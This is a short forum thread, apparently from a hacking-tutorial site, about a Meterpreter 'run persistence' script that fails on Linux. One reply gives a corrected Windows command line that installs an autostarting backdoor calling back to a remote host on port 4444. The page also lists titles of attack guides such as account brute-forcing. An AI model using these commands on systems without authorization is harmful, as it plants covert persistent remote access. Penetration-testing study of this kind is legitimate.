I am playing around with this tutorial and if I try this command run persistence -A -L /var/ -X 30 -p 4444 -r 10.601.37 it tells me x86/linux version of Meterpreter is not supported with this Script! and if I define -P with linux/meterpreter/reversetcp it still says the same thing. Am I doing something wrong?
Forum Thread: Meterpreter Persistence Issue
- Hot
- Active
-
Forum Thread: How to Track Who Is Sms Bombing Me . 4 Replies
2 mo ago -
Forum Thread: Removing Pay-as-You-Go Meter on Loan Phones. 1 Replies
2 mo ago -
Forum Thread: Hydra Syntax Issue Stops After 16 Attempts 3 Replies
2 mo ago -
Forum Thread: moab5.Sh Error While Running Metasploit 17 Replies
3 mo ago -
Forum Thread: Execute Reverse PHP Shell with Metasploit 1 Replies
4 mo ago -
Forum Thread: Install Metasploit Framework in Termux No Root Needed M-Wiz Tool 1 Replies
5 mo ago -
Forum Thread: Hack and Track People's Device Constantly Using TRAPE 35 Replies
6 mo ago -
Forum Thread: When My Kali Linux Finishes Installing (It Is Ready to Boot), and When I Try to Boot It All I Get Is a Black Screen. 8 Replies
6 mo ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 12 Replies
7 mo ago -
Forum Thread: Hack Instagram Account Using BruteForce 208 Replies
7 mo ago -
Forum Thread: Metasploit reverse_tcp Handler Problem 47 Replies
9 mo ago -
Forum Thread: How to Train to Be an IT Security Professional (Ethical Hacker) 22 Replies
9 mo ago -
Metasploit Error: Handler Failed to Bind 41 Replies
9 mo ago -
Forum Thread: How to Hack Android Phone Using Same Wifi 21 Replies
10 mo ago -
How to: HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide] 177 Replies
10 mo ago -
How to: Crack Instagram Passwords Using Instainsane 36 Replies
10 mo ago -
Forum Thread: How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More 5 Replies
10 mo ago -
Forum Thread: How Many Hackers Have Played Watch_Dogs Game Before? 13 Replies
10 mo ago -
Forum Thread: How to Hack an Android Device with Only a Ip Adress 55 Replies
11 mo ago -
How to: Sign the APK File with Embedded Payload (The Ultimate Guide) 10 Replies
11 mo ago
-
How To: Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
-
How To: Find Identifying Information from a Phone Number Using OSINT Tools
-
How To: Use Metasploit's WMAP Module to Scan Web Applications for Common Vulnerabilities
-
How To: Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel Spreadsheets
-
How To: Find Vulnerable Webcams Across the Globe Using Shodan
-
Android for Hackers: How to Turn an Android Phone into a Hacking Device Without Root
-
How To: The Hacks Behind Cracking, Part 1: How to Bypass Software Registration
-
How To: Dump a MacOS User's Chrome Passwords with EvilOSX
-
Hack Like a Pro: How to Use Netcat, the Swiss Army Knife of Hacking Tools
-
How To: Attack Web Applications with Burp Suite & SQL Injection
-
How To: Change File Metadata (Access/Modification Date)
-
How To: Scan for Vulnerabilities on Any Website Using Nikto
-
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To: Top 10 Things to Do After Installing Kali Linux
-
How To: Spy on Traffic from a Smartphone with Wireshark
-
How To: Scrape Target Email Addresses with TheHarvester
-
How To: Target Bluetooth Devices with Bettercap
-
How To: Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To: Perform Advanced Man-in-the-Middle Attacks with Xerosploit
-
How To: Install Kali Live on a USB Drive (With Persistence, Optional)
2 Responses
It looks like you forget to add the –i switch that can indicate the time interval between each connection attempt before 30 also check the location you are using if it's correct or not.
If you are trying this on Windows use this code:
run persistence -A -L c:\\ -X -i 30 -p 4444 -r 10.601.37
From what I read here: https://security.stackexchange.com/questions/95100/is-there-an-equivalent-of-meterpreters-run-persistence-for-linux the persistence script is only for windows and not for Linux. It does give a way to run persistence on Linux though, maybe you could try to make a script to automatically do it on Linux :)
Cheers,
Washu
Share Your Thoughts